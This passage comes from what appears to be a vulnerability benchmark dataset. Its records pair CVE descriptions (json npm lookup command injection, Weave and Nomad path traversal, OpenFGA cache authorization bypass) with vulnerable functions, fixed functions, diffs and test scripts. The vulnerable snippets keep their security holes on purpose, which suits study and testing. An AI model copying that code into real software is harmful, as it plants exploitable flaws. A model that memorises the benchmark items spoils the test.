the key has a `.` in it.\n //\n // Up to and including json v9, this was handled by eval'ing\n // the given string inside the brackets (via\n // `vm.runInNewContext`). However, trentm/json#144 shows\n // that this is an avenue for command injection. It was\n // never made clear in `json` documentation that one\n // should never use user-provided strings for LOOKUPs, so\n // we should close this vulnerability.\n //\n // Expected usage and documented examples are like this:\n // [\"foo.bar\"]\n // ['foo.bar']\n // However, older implementation of eval'ing meant that\n // things like the following worked:\n // [42]\n // [\"my\" + \"key\"]\n // [(function () { return \"mykey\" })()]\n //\n // The documentation was never explicit about denying\n // expressions would work. 
v10 **breaks compatibility**\n // to only support a bracketed string:\n // [\"...\"]\n // ['...']\n // [`...`] # note: no var interpolation is done\n // and error otherwise.\n var VALID_QUOTES = '\"\\'`';\n var sQuote = bit[1];\n var eQuote = bit.slice(-2, -1);\n if (VALID_QUOTES.indexOf(sQuote) === -1 ||\n sQuote !== eQuote)\n {\n throw new Error(format('invalid bracketed lookup ' +\n 'string: %j (must be of the form [\\'...\\'], ' +\n '[\"...\"], or [`...`])', bit));\n }\n bits.push(bit.slice(2, -2));\n bit = ''\n }\n break;\n }\n break;\n\n case '\"':\n bit += ch;\n switch (ch) {\n case '\"':\n states.pop();\n if (states[states.length - 1] === null) {\n bits.push(bit);\n bit = ''\n }\n break;\n }\n break;\n\n case '\\'':\n bit += ch;\n switch (ch) {\n case '\\'':\n states.pop();\n if (states[states.length - 1] === null) {\n bits.push(bit);\n bit = ''\n }\n break;\n }\n break;\n }\n debug('bit: ' + JSON.stringify(bit));\n debug('bits: ' + JSON.stringify(bits));\n }\n\n if (bit !== '') {\n bits.push(bit);\n bit = ''\n }\n\n // Negative-intify: strings that are negative ints we change to a Number for\n // special handling in `lookupDatum`: Python-style negative array indexing.\n var negIntPat = /^-\\d+$/;\n for (var i = 0; i < bits.length; i++) {\n if (negIntPat.test(bits[i])) {\n bits[i] = Number(bits[i]);\n }\n }\n\n debug(JSON.stringify(lookup) + ' -> ' + JSON.stringify(bits));\n return bits\n}"}, {"id": "fix_js_189_2", "commit": "cc47981", "file_path": "lib/json.js", "start_line": 1306, "end_line": 1451, "snippet": "function main(argv) {\n var opts;\n try {\n opts = parseArgv(argv);\n } catch (e) {\n warn('json: error: %s', e.message)\n return drainStdoutAndExit(1);\n }\n //warn(opts);\n if (opts.help) {\n printHelp();\n return;\n }\n if (opts.version) {\n if (opts.outputMode === OM_JSON) {\n var v = {\n version: getVersion(),\n author: 'Trent Mick',\n project: 'https://github.com/trentm/json'\n };\n console.log(JSON.stringify(v, null, opts.jsonIndent));\n } else {\n console.log('json ' + getVersion());\n console.log('written by Trent Mick');\n console.log('https://github.com/trentm/json');\n }\n return;\n }\n var lookupStrs = opts.args;\n\n // Prepare condition and execution funcs (and vm scripts) for -c/-e.\n var execVm = Boolean(process.env.JSON_EXEC &&\n process.env.JSON_EXEC === 'vm');\n var i;\n var condFuncs = [];\n if (!execVm) {\n for (i = 0; i < opts.condSnippets.length; i++) {\n condFuncs[i] = funcWithReturnFromSnippet(opts.condSnippets[i]);\n }\n }\n var condScripts = [];\n if (execVm) {\n for (i = 0; i < opts.condSnippets.length; i++) {\n condScripts[i] = vm.createScript(opts.condSnippets[i]);\n }\n }\n var cond = Boolean(condFuncs.length + condScripts.length);\n var exeFuncs = [];\n if (!execVm) {\n for (i = 0; i < opts.exeSnippets.length; i++) {\n exeFuncs[i] = new Function(opts.exeSnippets[i]);\n }\n }\n var exeScripts = [];\n if (execVm) {\n for (i = 0; i < opts.exeSnippets.length; i++) {\n exeScripts[i] = vm.createScript(opts.exeSnippets[i]);\n }\n }\n var exe = Boolean(exeFuncs.length + exeScripts.length);\n\n try {\n var lookups = lookupStrs.map(function (lookup) {\n return parseLookup(lookup, opts.lookupDelim);\n });\n } catch (e) {\n warn('json: error: %s', e.message)\n return drainStdoutAndExit(1);\n }\n\n if (opts.group && opts.array && opts.outputMode !== OM_JSON) {\n // streaming\n var chunker = chunkEmitter(opts);\n chunker.on('error', function (error) {\n warn('json: error: %s', err.message);\n return drainStdoutAndExit(1);\n });\n chunker.on('chunk', 
parseChunk);\n } else if (opts.inPlace) {\n assert.equal(opts.inputFiles.length, 1,\n 'cannot handle more than one file with -I');\n getInput(opts, function (err, content, filename) {\n if (err) {\n warn('json: error: %s', err.message)\n return drainStdoutAndExit(1);\n }\n\n // Take off a leading HTTP header if any and pass it through.\n var headers = [];\n while (true) {\n if (content.slice(0, 5) === 'HTTP/') {\n var index = content.indexOf('\\r\\n\\r\\n');\n var sepLen = 4;\n if (index == -1) {\n index = content.indexOf('\\n\\n');\n sepLen = 2;\n }\n if (index != -1) {\n if (!opts.dropHeaders) {\n headers.push(content.slice(0, index + sepLen));\n }\n var is100Continue = (\n content.slice(0, 21) === 'HTTP/1.1 100 Continue');\n content = content.slice(index + sepLen);\n if (is100Continue) {\n continue;\n }\n }\n }\n break;\n }\n parseChunk(content, undefined, filename, true, headers.join(''));\n });\n } else {\n // not streaming\n getInput(opts, function (err, buffer, filename) {\n if (err) {\n warn('json: error: %s', err.message)\n return drainStdoutAndExit(1);\n }\n // Take off a leading HTTP header if any and pass it through.\n while (true) {\n if (buffer.slice(0, 5) === 'HTTP/') {\n var index = buffer.indexOf('\\r\\n\\r\\n');\n var sepLen = 4;\n if (index == -1) {\n index = buffer.indexOf('\\n\\n');\n sepLen = 2;\n }\n if (index != -1) {\n if (!opts.dropHeaders) {\n emit(buffer.slice(0, index + sepLen));\n }\n var is100Continue = (\n buffer.slice(0, 21) === 'HTTP/1.1 100 Continue');\n buffer = buffer.slice(index + sepLen);\n if (is100Continue) {\n continue;\n }\n }\n }\n break;\n }\n parseChunk(buffer, null, filename, false);\n });\n }"}], "vul_patch": "--- a/lib/json.js\n+++ b/lib/json.js\n@@ -1,6 +1,6 @@\n function parseLookup(lookup, lookupDelim) {\n var debug = function () {};\n- //var debug = console.warn;\n+ // var debug = console.warn;\n \n var bits = [];\n debug('\\n*** ' + lookup + ' ***');\n@@ -12,15 +12,35 @@\n var escaped = false;\n var ch = null;\n for (var i = 0; i < lookup.length; ++i) {\n- var escaped = (!escaped && ch === '\\\\');\n var ch = lookup[i];\n debug('-- i=' + i + ', ch=' + JSON.stringify(ch) + ' escaped=' +\n JSON.stringify(escaped));\n debug('states: ' + JSON.stringify(states));\n \n- if (escaped) {\n- bit += ch;\n- continue;\n+ // Handle a *limited subset* of JS string escapes.\n+ // JSSTYLED\n+ // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation\n+ var SUPPORTED_ESCAPES = {\n+ '\\'': '\\'',\n+ '\\\"': '\\\"',\n+ '\\`': '\\`',\n+ '\\\\': '\\\\',\n+ 'n': '\\n',\n+ 'r': '\\r',\n+ 't': '\\t',\n+ 'v': '\\v',\n+ 'b': '\\b',\n+ 'f': '\\f'\n+ };\n+ if (ch === '\\\\' && i+1 < lookup.length) {\n+ var nextCh = lookup[i+1];\n+ var escapedCh = SUPPORTED_ESCAPES[nextCh];\n+ if (escapedCh !== undefined) {\n+ debug('escaped: %j -> %j', ch+nextCh, escapedCh);\n+ bit += escapedCh;\n+ i++;\n+ continue;\n+ }\n }\n \n switch (states[states.length - 1]) {\n@@ -62,9 +82,47 @@\n case ']':\n states.pop();\n if (states[states.length - 1] === null) {\n- var evaled = vm.runInNewContext(\n- '(' + bit.slice(1, -1) + ')', {}, '');\n- bits.push(evaled);\n+ // `bit` is a bracketed string, `[...]`.\n+ //\n+ // The *intent* is to allow specifying an object key\n+ // that would otherwise get interpreted by `json`s\n+ // LOOKUP parsing -- typically if the key has a `.` in it.\n+ //\n+ // Up to and including json v9, this was handled by eval'ing\n+ // the given string inside the brackets (via\n+ // `vm.runInNewContext`). 
However, trentm/json#144 shows\n+ // that this is an avenue for command injection. It was\n+ // never made clear in `json` documentation that one\n+ // should never use user-provided strings for LOOKUPs, so\n+ // we should close this vulnerability.\n+ //\n+ // Expected usage and documented examples are like this:\n+ // [\"foo.bar\"]\n+ // ['foo.bar']\n+ // However, older implementation of eval'ing meant that\n+ // things like the following worked:\n+ // [42]\n+ // [\"my\" + \"key\"]\n+ // [(function () { return \"mykey\" })()]\n+ //\n+ // The documentation was never explicit about denying\n+ // expressions would work. v10 **breaks compatibility**\n+ // to only support a bracketed string:\n+ // [\"...\"]\n+ // ['...']\n+ // [`...`] # note: no var interpolation is done\n+ // and error otherwise.\n+ var VALID_QUOTES = '\"\\'`';\n+ var sQuote = bit[1];\n+ var eQuote = bit.slice(-2, -1);\n+ if (VALID_QUOTES.indexOf(sQuote) === -1 ||\n+ sQuote !== eQuote)\n+ {\n+ throw new Error(format('invalid bracketed lookup ' +\n+ 'string: %j (must be of the form [\\'...\\'], ' +\n+ '[\"...\"], or [`...`])', bit));\n+ }\n+ bits.push(bit.slice(2, -2));\n bit = ''\n }\n break;\n\n--- a/lib/json.js\n+++ b/lib/json.js\n@@ -59,9 +59,14 @@\n }\n var exe = Boolean(exeFuncs.length + exeScripts.length);\n \n- var lookups = lookupStrs.map(function (lookup) {\n- return parseLookup(lookup, opts.lookupDelim);\n- });\n+ try {\n+ var lookups = lookupStrs.map(function (lookup) {\n+ return parseLookup(lookup, opts.lookupDelim);\n+ });\n+ } catch (e) {\n+ warn('json: error: %s', e.message)\n+ return drainStdoutAndExit(1);\n+ }\n \n if (opts.group && opts.array && opts.outputMode !== OM_JSON) {\n // streaming\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-7340", "cve_description": "The Weave server API allows remote users to fetch files from a specific directory, but due to a lack of input validation, it is possible to traverse and leak arbitrary files remotely. In various common scenarios, this allows a low-privileged user to assume the role of the server admin.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/wandb/weave", "patch_url": ["https://github.com/wandb/weave/commit/f43d5fb75e0d52933a52ecd9a0ce2f9b082e6c9f"], "programing_language": "Python", "vul_func": [{"id": "vul_py_132_1", "commit": "c28d8d5", "file_path": "weave/weave_server.py", "start_line": 398, "end_line": 411, "snippet": "def send_local_file(path):\n # path is given relative to the FS root. check to see that path is a subdirectory of the\n # local artifacts path. if not, return 403. 
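The json v10 fix quoted in this record stops eval'ing bracketed lookup segments via vm.runInNewContext and instead accepts only a literal quoted string between the brackets. A small rendering of that validation rule, written in Go for consistency with the other sketches in this section (the function below is illustrative, not part of the json package):

```go
package main

import (
	"fmt"
	"strings"
)

// parseBracketedLookup accepts exactly ["..."], ['...'], or [`...`] and
// returns the inner key as a literal string. Nothing between the brackets
// is ever evaluated, which is the whole point of the fix.
func parseBracketedLookup(bit string) (string, error) {
	if len(bit) < 4 || !strings.HasPrefix(bit, "[") || !strings.HasSuffix(bit, "]") {
		return "", fmt.Errorf("invalid bracketed lookup: %q", bit)
	}
	inner := bit[1 : len(bit)-1]
	q := inner[0]
	if (q != '"' && q != '\'' && q != '`') || inner[len(inner)-1] != q {
		return "", fmt.Errorf("lookup must be a plain quoted string: %q", bit)
	}
	return inner[1 : len(inner)-1], nil
}

func main() {
	key, err := parseBracketedLookup(`["foo.bar"]`)
	fmt.Println(key, err) // foo.bar <nil>
	_, err = parseBracketedLookup(`[console.log("pwned")]`)
	fmt.Println(err) // rejected instead of executed
}
```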
then if there is a cache scope function defined\n # call it to make sure we have access to the path\n abspath = (\n \"/\" / pathlib.Path(path)\n ) # add preceding slash as werkzeug strips this by default and it is reappended below in send_from_directory\n try:\n local_artifacts_path = pathlib.Path(filesystem.get_filesystem_dir()).absolute()\n except errors.WeaveAccessDeniedError:\n abort(403)\n if local_artifacts_path not in list(abspath.parents):\n abort(403)\n return send_from_directory(\"/\", path)"}], "fix_func": [{"id": "fix_py_132_1", "commit": "f43d5fb", "file_path": "weave/weave_server.py", "start_line": 398, "end_line": 417, "snippet": "def send_local_file(path):\n try:\n # Retrieve and normalize the local artifacts path\n local_artifacts_path = pathlib.Path(filesystem.get_filesystem_dir()).resolve(\n strict=True\n )\n\n # Construct the full absolute path of the requested file\n requested_path = (local_artifacts_path / path).resolve(strict=True)\n\n # Ensure the requested path is within the local artifacts directory\n if not str(requested_path).startswith(str(local_artifacts_path)):\n abort(403)\n\n # Send the file from the directory\n return send_from_directory(\n local_artifacts_path, str(requested_path.relative_to(local_artifacts_path))\n )\n except (errors.WeaveAccessDeniedError, FileNotFoundError):\n abort(403)"}], "vul_patch": "--- a/weave/weave_server.py\n+++ b/weave/weave_server.py\n@@ -1,14 +1,20 @@\n def send_local_file(path):\n- # path is given relative to the FS root. check to see that path is a subdirectory of the\n- # local artifacts path. if not, return 403. then if there is a cache scope function defined\n- # call it to make sure we have access to the path\n- abspath = (\n- \"/\" / pathlib.Path(path)\n- ) # add preceding slash as werkzeug strips this by default and it is reappended below in send_from_directory\n try:\n- local_artifacts_path = pathlib.Path(filesystem.get_filesystem_dir()).absolute()\n- except errors.WeaveAccessDeniedError:\n+ # Retrieve and normalize the local artifacts path\n+ local_artifacts_path = pathlib.Path(filesystem.get_filesystem_dir()).resolve(\n+ strict=True\n+ )\n+\n+ # Construct the full absolute path of the requested file\n+ requested_path = (local_artifacts_path / path).resolve(strict=True)\n+\n+ # Ensure the requested path is within the local artifacts directory\n+ if not str(requested_path).startswith(str(local_artifacts_path)):\n+ abort(403)\n+\n+ # Send the file from the directory\n+ return send_from_directory(\n+ local_artifacts_path, str(requested_path.relative_to(local_artifacts_path))\n+ )\n+ except (errors.WeaveAccessDeniedError, FileNotFoundError):\n abort(403)\n- if local_artifacts_path not in list(abspath.parents):\n- abort(403)\n- return send_from_directory(\"/\", path)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-46331", "cve_description": "OpenFGA is a high-performance and flexible authorization/permission engine built for developers and inspired by Google Zanzibar. OpenFGA v1.8.10 to v1.3.6 (Helm chart <= openfga-0.2.28, docker <= v.1.8.10) are vulnerable to authorization bypass when certain Check and ListObject calls are executed. 
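The Weave patch above resolves both the artifacts root and the requested file (resolve(strict=True)) and then checks that one is a string prefix of the other. A Go sketch of the same containment idea; it uses filepath.Rel rather than a raw prefix test, which avoids the classic false positive where "/srv/database" passes a prefix check against the root "/srv/data" (the helper name and paths here are hypothetical):

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// insideRoot resolves symlinks in both the root and the requested path,
// then verifies the target does not escape the root.
func insideRoot(root, requested string) (string, error) {
	rootAbs, err := filepath.EvalSymlinks(root)
	if err != nil {
		return "", err
	}
	target, err := filepath.EvalSymlinks(filepath.Join(rootAbs, requested))
	if err != nil {
		return "", err // also rejects nonexistent files, like resolve(strict=True)
	}
	rel, err := filepath.Rel(rootAbs, target)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", fmt.Errorf("path escapes root: %q", requested)
	}
	return target, nil
}

func main() {
	_, err := insideRoot("/tmp", "../etc/passwd")
	fmt.Println(err) // rejected: resolves outside /tmp
}
```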
This issue has been patched in version 1.8.11.", "cwe_info": {"CWE-284": {"name": "Improper Access Control", "description": "The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor."}}, "repo": "https://github.com/openfga/openfga", "patch_url": ["https://github.com/openfga/openfga/commit/244302e7a8b979d66cc1874a3899cdff7d47862f"], "programing_language": "Go", "vul_func": [{"id": "vul_go_67_1", "commit": "1486ac4", "file_path": "internal/graph/cached_resolver.go", "start_line": 145, "end_line": 194, "snippet": "func (c *CachedCheckResolver) ResolveCheck(\n\tctx context.Context,\n\treq *ResolveCheckRequest,\n) (*ResolveCheckResponse, error) {\n\tspan := trace.SpanFromContext(ctx)\n\n\tcacheKey := BuildCacheKey(*req)\n\n\ttryCache := req.Consistency != openfgav1.ConsistencyPreference_HIGHER_CONSISTENCY\n\n\tif tryCache {\n\t\tcheckCacheTotalCounter.Inc()\n\t\tif cachedResp := c.cache.Get(cacheKey); cachedResp != nil {\n\t\t\tres := cachedResp.(*CheckResponseCacheEntry)\n\t\t\tisValid := res.LastModified.After(req.LastCacheInvalidationTime)\n\t\t\tc.logger.Debug(\"CachedCheckResolver found cache key\",\n\t\t\t\tzap.String(\"store_id\", req.GetStoreID()),\n\t\t\t\tzap.String(\"authorization_model_id\", req.GetAuthorizationModelID()),\n\t\t\t\tzap.String(\"tuple_key\", req.GetTupleKey().String()),\n\t\t\t\tzap.Bool(\"isValid\", isValid))\n\n\t\t\tspan.SetAttributes(attribute.Bool(\"cached\", isValid))\n\t\t\tif isValid {\n\t\t\t\tcheckCacheHitCounter.Inc()\n\t\t\t\t// return a copy to avoid races across goroutines\n\t\t\t\treturn res.CheckResponse.clone(), nil\n\t\t\t}\n\n\t\t\t// we tried the cache and hit an invalid entry\n\t\t\tcheckCacheInvalidHit.Inc()\n\t\t} else {\n\t\t\tc.logger.Debug(\"CachedCheckResolver not found cache key\",\n\t\t\t\tzap.String(\"store_id\", req.GetStoreID()),\n\t\t\t\tzap.String(\"authorization_model_id\", req.GetAuthorizationModelID()),\n\t\t\t\tzap.String(\"tuple_key\", req.GetTupleKey().String()))\n\t\t}\n\t}\n\n\t// not in cache, or consistency options experimental flag is set, and consistency param set to HIGHER_CONSISTENCY\n\tresp, err := c.delegate.ResolveCheck(ctx, req)\n\tif err != nil {\n\t\ttelemetry.TraceError(span, err)\n\t\treturn nil, err\n\t}\n\n\tclonedResp := resp.clone()\n\n\tc.cache.Set(cacheKey, &CheckResponseCacheEntry{LastModified: time.Now(), CheckResponse: clonedResp}, c.cacheTTL)\n\treturn resp, nil\n}"}], "fix_func": [{"id": "fix_go_67_1", "commit": "244302e", "file_path": "internal/graph/cached_resolver.go", "start_line": 145, "end_line": 206, "snippet": "func (c *CachedCheckResolver) ResolveCheck(\n\tctx context.Context,\n\treq *ResolveCheckRequest,\n) (*ResolveCheckResponse, error) {\n\tspan := trace.SpanFromContext(ctx)\n\n\tcacheKey := BuildCacheKey(*req)\n\n\ttryCache := req.Consistency != openfgav1.ConsistencyPreference_HIGHER_CONSISTENCY\n\n\tif tryCache {\n\t\tcheckCacheTotalCounter.Inc()\n\t\tif cachedResp := c.cache.Get(cacheKey); cachedResp != nil {\n\t\t\tres := cachedResp.(*CheckResponseCacheEntry)\n\t\t\tisValid := res.LastModified.After(req.LastCacheInvalidationTime)\n\t\t\tc.logger.Debug(\"CachedCheckResolver found cache key\",\n\t\t\t\tzap.String(\"store_id\", req.GetStoreID()),\n\t\t\t\tzap.String(\"authorization_model_id\", req.GetAuthorizationModelID()),\n\t\t\t\tzap.String(\"tuple_key\", req.GetTupleKey().String()),\n\t\t\t\tzap.Bool(\"isValid\", isValid))\n\n\t\t\tspan.SetAttributes(attribute.Bool(\"cached\", isValid))\n\t\t\tif isValid 
{\n\t\t\t\tcheckCacheHitCounter.Inc()\n\t\t\t\t// return a copy to avoid races across goroutines\n\t\t\t\treturn res.CheckResponse.clone(), nil\n\t\t\t}\n\n\t\t\t// we tried the cache and hit an invalid entry\n\t\t\tcheckCacheInvalidHit.Inc()\n\t\t} else {\n\t\t\tc.logger.Debug(\"CachedCheckResolver not found cache key\",\n\t\t\t\tzap.String(\"store_id\", req.GetStoreID()),\n\t\t\t\tzap.String(\"authorization_model_id\", req.GetAuthorizationModelID()),\n\t\t\t\tzap.String(\"tuple_key\", req.GetTupleKey().String()))\n\t\t}\n\t}\n\n\t// not in cache, or consistency options experimental flag is set, and consistency param set to HIGHER_CONSISTENCY\n\tresp, err := c.delegate.ResolveCheck(ctx, req)\n\tif err != nil {\n\t\ttelemetry.TraceError(span, err)\n\t\treturn nil, err\n\t}\n\n\t// when the response indicates cycle detected. The result is indeterminate because the\n\t// parent of the cycle could have resolved to true. Thus, we don't save the result and let\n\t// the parent handle it.\n\tif resp.GetCycleDetected() {\n\t\tspan.SetAttributes(attribute.Bool(\"cycle_detected\", true))\n\t\tc.logger.Debug(\"CachedCheckResolver not saving to cache due to cycle\",\n\t\t\tzap.String(\"store_id\", req.GetStoreID()),\n\t\t\tzap.String(\"authorization_model_id\", req.GetAuthorizationModelID()),\n\t\t\tzap.String(\"tuple_key\", req.GetTupleKey().String()))\n\t\treturn resp, nil\n\t}\n\n\tclonedResp := resp.clone()\n\n\tc.cache.Set(cacheKey, &CheckResponseCacheEntry{LastModified: time.Now(), CheckResponse: clonedResp}, c.cacheTTL)\n\treturn resp, nil\n}"}], "vul_patch": "--- a/internal/graph/cached_resolver.go\n+++ b/internal/graph/cached_resolver.go\n@@ -43,6 +43,18 @@\n \t\treturn nil, err\n \t}\n \n+\t// when the response indicates cycle detected. The result is indeterminate because the\n+\t// parent of the cycle could have resolved to true. Thus, we don't save the result and let\n+\t// the parent handle it.\n+\tif resp.GetCycleDetected() {\n+\t\tspan.SetAttributes(attribute.Bool(\"cycle_detected\", true))\n+\t\tc.logger.Debug(\"CachedCheckResolver not saving to cache due to cycle\",\n+\t\t\tzap.String(\"store_id\", req.GetStoreID()),\n+\t\t\tzap.String(\"authorization_model_id\", req.GetAuthorizationModelID()),\n+\t\t\tzap.String(\"tuple_key\", req.GetTupleKey().String()))\n+\t\treturn resp, nil\n+\t}\n+\n \tclonedResp := resp.clone()\n \n \tc.cache.Set(cacheKey, &CheckResponseCacheEntry{LastModified: time.Now(), CheckResponse: clonedResp}, c.cacheTTL)\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2025-46331:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/openfga\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestCachedCheckResolver_FieldsInResponse$ github.com/openfga/openfga/internal/graph\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2025-46331:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/openfga\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(TestResolveCheck_ConcurrentCachedReadsAndWrites|TestResolveCheckFromCache|TestBuildCacheKey|TestResolveCheckExpired|TestResolveCheckLastChangelogRecent)$' github.com/openfga/openfga/internal/graph"} {"cve_id": "CVE-2020-28348", "cve_description": "HashiCorp Nomad and Nomad Enterprise 0.9.0 up to 0.12.7 client Docker file sandbox feature may be subverted when not explicitly disabled or when using a volume mount type. 
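The OpenFGA patch above declines to cache check responses whose resolution hit a cycle: such answers are indeterminate, and caching one could let a stale "unknown" shadow a later, fully resolved authorization decision. A toy memoizing resolver showing the same rule (all types and names below are invented for the sketch, not OpenFGA's):

```go
package main

import (
	"sync"
	"time"
)

type checkResult struct {
	Allowed       bool
	CycleDetected bool // indeterminate outcome, like resp.GetCycleDetected()
}

type entry struct {
	res      checkResult
	deadline time.Time
}

type checkCache struct {
	mu  sync.Mutex
	ttl time.Duration
	m   map[string]entry
}

func (c *checkCache) resolve(key string, delegate func() checkResult) checkResult {
	c.mu.Lock()
	if e, ok := c.m[key]; ok && time.Now().Before(e.deadline) {
		c.mu.Unlock()
		return e.res
	}
	c.mu.Unlock()

	res := delegate()
	if res.CycleDetected {
		// Indeterminate: return it to the caller, but never store it.
		return res
	}

	c.mu.Lock()
	c.m[key] = entry{res: res, deadline: time.Now().Add(c.ttl)}
	c.mu.Unlock()
	return res
}

func main() {
	c := &checkCache{ttl: time.Minute, m: map[string]entry{}}
	_ = c.resolve("user:anne#viewer@doc:1", func() checkResult {
		return checkResult{CycleDetected: true} // returned, but never cached
	})
}
```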
Fixed in 0.12.8, 0.11.7, and 0.10.8.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/hashicorp/nomad", "patch_url": ["https://github.com/hashicorp/nomad/commit/9c1073d9633691ff7ba8804f59c68b822af521bd", "https://github.com/hashicorp/nomad/commit/d81120b0fd97c3d2acb65983d89ff8f9241bcdf9", "https://github.com/hashicorp/nomad/commit/60871f6024469d6846a473269b9aa637b6e42d0e"], "programing_language": "Go", "vul_func": [{"id": "vul_go_260_1", "commit": "cd01438c153b844009f501a7cc5447137f398094", "file_path": "drivers/docker/driver.go", "start_line": 675, "end_line": 1050, "snippet": "func (d *Driver) createContainerConfig(task *drivers.TaskConfig, driverConfig *TaskConfig,\n\timageID string) (docker.CreateContainerOptions, error) {\n\n\t// ensure that PortMap variables are populated early on\n\ttask.Env = taskenv.SetPortMapEnvs(task.Env, driverConfig.PortMap)\n\n\tlogger := d.logger.With(\"task_name\", task.Name)\n\tvar c docker.CreateContainerOptions\n\tif task.Resources == nil {\n\t\t// Guard against missing resources. We should never have been able to\n\t\t// schedule a job without specifying this.\n\t\tlogger.Error(\"task.Resources is empty\")\n\t\treturn c, fmt.Errorf(\"task.Resources is empty\")\n\t}\n\n\tbinds, err := d.containerBinds(task, driverConfig)\n\tif err != nil {\n\t\treturn c, err\n\t}\n\tlogger.Trace(\"binding volumes\", \"volumes\", binds)\n\n\t// create the config block that will later be consumed by go-dockerclient\n\tconfig := &docker.Config{\n\t\tImage: imageID,\n\t\tEntrypoint: driverConfig.Entrypoint,\n\t\tHostname: driverConfig.Hostname,\n\t\tUser: task.User,\n\t\tTty: driverConfig.TTY,\n\t\tOpenStdin: driverConfig.Interactive,\n\t}\n\n\tif driverConfig.WorkDir != \"\" {\n\t\tconfig.WorkingDir = driverConfig.WorkDir\n\t}\n\n\thostConfig := &docker.HostConfig{\n\t\tMemory: task.Resources.LinuxResources.MemoryLimitBytes,\n\t\tCPUShares: task.Resources.LinuxResources.CPUShares,\n\n\t\t// Binds are used to mount a host volume into the container. 
We mount a\n\t\t// local directory for storage and a shared alloc directory that can be\n\t\t// used to share data between different tasks in the same task group.\n\t\tBinds: binds,\n\n\t\tStorageOpt: driverConfig.StorageOpt,\n\t\tVolumeDriver: driverConfig.VolumeDriver,\n\n\t\tPidsLimit: driverConfig.PidsLimit,\n\t}\n\n\tif _, ok := task.DeviceEnv[nvidiaVisibleDevices]; ok {\n\t\tif !d.gpuRuntime {\n\t\t\treturn c, fmt.Errorf(\"requested docker-runtime %q was not found\", d.config.GPURuntimeName)\n\t\t}\n\t\thostConfig.Runtime = d.config.GPURuntimeName\n\t}\n\n\t// Calculate CPU Quota\n\t// cfs_quota_us is the time per core, so we must\n\t// multiply the time by the number of cores available\n\t// See https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/resource_management_guide/sec-cpu\n\tif driverConfig.CPUHardLimit {\n\t\tnumCores := runtime.NumCPU()\n\t\tif driverConfig.CPUCFSPeriod < 0 || driverConfig.CPUCFSPeriod > 1000000 {\n\t\t\treturn c, fmt.Errorf(\"invalid value for cpu_cfs_period\")\n\t\t}\n\t\tif driverConfig.CPUCFSPeriod == 0 {\n\t\t\tdriverConfig.CPUCFSPeriod = task.Resources.LinuxResources.CPUPeriod\n\t\t}\n\t\thostConfig.CPUPeriod = driverConfig.CPUCFSPeriod\n\t\thostConfig.CPUQuota = int64(task.Resources.LinuxResources.PercentTicks*float64(driverConfig.CPUCFSPeriod)) * int64(numCores)\n\t}\n\n\t// Windows does not support MemorySwap/MemorySwappiness #2193\n\tif runtime.GOOS == \"windows\" {\n\t\thostConfig.MemorySwap = 0\n\t\thostConfig.MemorySwappiness = -1\n\t} else {\n\t\thostConfig.MemorySwap = task.Resources.LinuxResources.MemoryLimitBytes // MemorySwap is memory + swap.\n\t}\n\n\tloggingDriver := driverConfig.Logging.Type\n\tif loggingDriver == \"\" {\n\t\tloggingDriver = driverConfig.Logging.Driver\n\t}\n\n\thostConfig.LogConfig = docker.LogConfig{\n\t\tType: loggingDriver,\n\t\tConfig: driverConfig.Logging.Config,\n\t}\n\n\tif hostConfig.LogConfig.Type == \"\" && hostConfig.LogConfig.Config == nil {\n\t\tlogger.Trace(\"no docker log driver provided, defaulting to json-file\")\n\t\thostConfig.LogConfig.Type = \"json-file\"\n\t\thostConfig.LogConfig.Config = map[string]string{\n\t\t\t\"max-file\": \"2\",\n\t\t\t\"max-size\": \"2m\",\n\t\t}\n\t}\n\n\tlogger.Debug(\"configured resources\", \"memory\", hostConfig.Memory,\n\t\t\"cpu_shares\", hostConfig.CPUShares, \"cpu_quota\", hostConfig.CPUQuota,\n\t\t\"cpu_period\", hostConfig.CPUPeriod)\n\tlogger.Debug(\"binding directories\", \"binds\", hclog.Fmt(\"%#v\", hostConfig.Binds))\n\n\t// set privileged mode\n\tif driverConfig.Privileged && !d.config.AllowPrivileged {\n\t\treturn c, fmt.Errorf(`Docker privileged mode is disabled on this Nomad agent`)\n\t}\n\thostConfig.Privileged = driverConfig.Privileged\n\n\t// set capabilities\n\thostCapsWhitelistConfig := d.config.AllowCaps\n\thostCapsWhitelist := make(map[string]struct{})\n\tfor _, cap := range hostCapsWhitelistConfig {\n\t\tcap = strings.ToLower(strings.TrimSpace(cap))\n\t\thostCapsWhitelist[cap] = struct{}{}\n\t}\n\n\tif _, ok := hostCapsWhitelist[\"all\"]; !ok {\n\t\teffectiveCaps, err := tweakCapabilities(\n\t\t\tstrings.Split(dockerBasicCaps, \",\"),\n\t\t\tdriverConfig.CapAdd,\n\t\t\tdriverConfig.CapDrop,\n\t\t)\n\t\tif err != nil {\n\t\t\treturn c, err\n\t\t}\n\t\tvar missingCaps []string\n\t\tfor _, cap := range effectiveCaps {\n\t\t\tcap = 